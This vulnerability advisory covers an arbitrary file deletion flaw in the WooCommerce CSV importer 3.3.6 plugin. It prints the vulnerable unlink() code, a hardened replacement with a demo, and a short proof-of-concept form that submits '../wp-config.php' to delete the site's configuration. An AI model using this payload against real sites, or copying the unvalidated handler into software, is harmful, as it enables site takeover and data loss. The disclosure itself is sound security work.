Plugin Woocommerce CSV importer 3.3.6 – Arbitrary File Deletion – Unlink

Details

  • Name : Woocommerce CSV importer
  • Version : 3.3.6
  • Homepage : https://wordpress.org/plugins/woocommerce-csvimport/

Type

  • Arbitrary File Deletion
  • Remote Code Execution - RCE

Description

  • Required access: any registered user.
  • $_POST['filename'] is passed to unlink() without being escaped or validated.

Code

File: wp-content/plugins/woocommerce-csvimport/export/include/classes/woocsvExport.php Line:64
public function delete_export_file() {
   
   if ( isset( $_POST['filename'] ) ) {
      @unlink( $_POST['filename'] );
   }
   wp_die( 0 );
}
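
A hardened form of the handler above, as an added example that is not the plugin's own code or the vendor's fix. It restricts deletion to CSV files that sit directly in one export directory and requires a nonce and a capability. The constant EXPORT_DIR, the nonce action 'woocsv_delete_export' and the choice of the 'manage_woocommerce' capability are assumptions.

```php
<?php
// Added example, not the plugin's code. EXPORT_DIR and the nonce action
// 'woocsv_delete_export' are assumed names; 'manage_woocommerce' is the
// capability WooCommerce grants to shop managers and administrators.

/**
 * Map a user-supplied name to a file directly inside $base_dir, or return
 * null if it points anywhere else (traversal, absolute path, symlink target).
 */
function woocsv_safe_export_path( string $base_dir, string $filename ): ?string {
    $name = basename( str_replace( '\\', '/', $filename ) ); // drop any directory part
    if ( $name === '' || $name[0] === '.' || ! preg_match( '/\.csv$/i', $name ) ) {
        return null;                                         // only visible *.csv files
    }
    $base = realpath( $base_dir );
    $path = realpath( $base_dir . DIRECTORY_SEPARATOR . $name ); // resolves symlinks
    if ( $base === false || $path === false || ! is_file( $path ) ) {
        return null;
    }
    // After resolution the file must still sit directly in the export directory.
    return dirname( $path ) === $base ? $path : null;
}

// Hardened AJAX handler (runs only inside WordPress; not called in the demo).
function woocsv_delete_export_file() {
    check_ajax_referer( 'woocsv_delete_export' );        // CSRF token, dies on failure
    if ( ! current_user_can( 'manage_woocommerce' ) ) {  // not "any registered user"
        wp_die( -1, 403 );
    }
    $raw  = isset( $_POST['filename'] ) ? wp_unslash( $_POST['filename'] ) : '';
    $path = woocsv_safe_export_path( EXPORT_DIR, (string) $raw );
    if ( $path !== null ) {
        unlink( $path );
    }
    wp_die( 0 );
}

// Stand-alone demo on a constructed temporary directory (no WordPress needed).
if ( PHP_SAPI === 'cli' && ! function_exists( 'wp_die' ) ) {
    $root = sys_get_temp_dir() . '/woocsv_demo_' . getmypid();
    mkdir( "$root/exports", 0700, true );
    touch( "$root/wp-config.php" );
    touch( "$root/exports/products.csv" );
    foreach ( array( '../wp-config.php', "$root/wp-config.php", 'products.csv' ) as $in ) {
        $out = woocsv_safe_export_path( "$root/exports", $in );
        echo str_pad( $in, 40 ), ' => ', $out === null ? 'rejected' : 'allowed', "\n";
    }
}
```

Run from the command line, the demo rejects the two wp-config.php inputs and allows only products.csv.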

Proof of Concept

1 – Log in with any user.
2 – Submit the following form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
</form>

Results

wp-config.php is deleted, and the whole system is restarted.

Note


Solution


Timeline

  • Date Discovery : 11/23/2017
  • Date Vendor Contact : 12/29/2017
  • Date Publish :
  • Date Resolution :